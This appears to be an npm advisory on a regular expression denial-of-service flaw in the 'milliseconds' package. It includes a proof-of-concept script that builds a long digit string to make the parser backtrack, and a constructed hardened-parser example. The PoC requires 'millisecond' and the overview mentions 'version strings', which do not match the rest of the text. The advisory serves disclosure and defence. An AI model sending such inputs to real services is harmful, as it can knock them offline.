npm

Severity: moderate

Regular Expression Denial of Service

milliseconds

Overview

Versions of milliseconds prior to 0.1.2 are affected by a regular expression denial of service vulnerability when extremely long version strings are parsed.

Proof of concept

var ms = require('millisecond');

// Builds a string of len+1 copies of chr (the loop bound is inclusive).
var genstr = function (len, chr) {
    var result = "";
    for (var i = 0; i <= len; i++) {
        result = result + chr;
    }

    return result;
}

// A long run of digits followed by a unit that does not match ("minutea")
// makes the parser's regular expression backtrack; the length of the run is
// taken from the first command-line argument.
ms(genstr(process.argv[2], "5") + " minutea");

Remediation

Update to version 0.1.2 or later.
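As an added example (not the millisecond package's own code), the shape of a backtracking-prone duration pattern beside a hardened parser that bounds input length and uses an unambiguous number grammar; both regular expressions, the unit table and the MAX_INPUT bound are constructed for illustration.

```javascript
// Ambiguous number grammar: "(?:\d+)?\.?\d+" lets the engine split one run of
// digits in many ways, and when the unit fails to match ("minutea") every split
// is retried, giving quadratic work in the input length. Constructed example,
// not the pattern from the package.
const AMBIGUOUS = /^((?:\d+)?\.?\d+) *(ms|s|seconds?|m|minutes?|h|hours?)?$/i;

// Hardened grammar: integer part with an optional fraction, or a bare fraction.
// Each digit can belong to exactly one place, so a failed match backtracks
// linearly.
const STRICT = /^(\d+(?:\.\d+)?|\.\d+) *(ms|s|seconds?|m|minutes?|h|hours?)?$/i;

// Duration strings are short; reject oversized input before any regex runs.
// Assumed bound, chosen for this example.
const MAX_INPUT = 100;

// Constructed unit table (milliseconds per unit).
const UNIT_MS = {
  ms: 1,
  s: 1000, second: 1000, seconds: 1000,
  m: 60000, minute: 60000, minutes: 60000,
  h: 3600000, hour: 3600000, hours: 3600000,
};

// Parses "5 minutes", "1.5h", ".5s" or "250" into milliseconds; returns
// undefined (fails closed) for non-strings, oversized input or unknown units.
function parseDuration(str) {
  if (typeof str !== 'string' || str.length > MAX_INPUT) return undefined;
  const m = STRICT.exec(str);
  if (!m) return undefined;
  const unit = (m[2] || 'ms').toLowerCase();
  return parseFloat(m[1]) * UNIT_MS[unit];
}

// Measures, in milliseconds, how long a pattern takes on n digits followed by
// a non-matching unit; compare AMBIGUOUS against STRICT as n grows.
function timeMatch(re, n) {
  const input = '5'.repeat(n) + ' minutea';
  const start = process.hrtime.bigint();
  re.test(input);
  return Number(process.hrtime.bigint() - start) / 1e6;
}
```

Running `timeMatch(AMBIGUOUS, n)` for increasing n shows the quadratic growth, while `timeMatch(STRICT, n)` stays flat; in production the length check makes the pattern's behaviour on huge inputs irrelevant.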

Advisory timeline

  1. Published: Advisory published, Nov 20th, 2015
  2. Reported: Initial report by Luigi Pinca, Nov 20th, 2015